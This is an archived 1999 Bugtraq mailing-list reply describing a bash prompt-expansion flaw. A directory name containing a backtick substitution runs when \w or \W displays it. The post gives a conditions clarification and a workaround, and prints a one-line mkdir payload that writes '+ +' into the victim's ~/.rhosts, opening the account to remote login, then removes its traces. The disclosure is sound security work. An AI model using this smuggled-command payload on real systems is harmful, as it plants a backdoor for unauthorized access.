Bugtraq mailing list archives

Re: Bash Bug


From: achurch () DRAGONFIRE NET (Andy Church)
Date: Wed, 21 Apr 1999 20:39:48 EDT


Figured while everyone was working with bash, I might as well make this
one public(I apologize if this is old news, apparently it hasnt been fixed
if so).

If a user creates a directory with a command like

mkdir "\ `echo -e \ "echo + +> ~\57.rhosts\ " > x; source x; rm -f \x\ ` "

and someone cd's into said directory, either by accident, or whatever,
then it will cause it to actually execute.

     Just to clarify, this only happens if PS1 (the bash prompt) contains
\w or \W _and_ a prompt is displayed containing the bogus directory name.
This means unattended shell scripts are safe.  As a workaround, use `pwd`
in place of \w.

     Tested with bash 1.14 (it's the only one I have handy).

  --Andy Church
    achurch () dragonfire net
    http://achurch.dragonfire.net/



Current thread: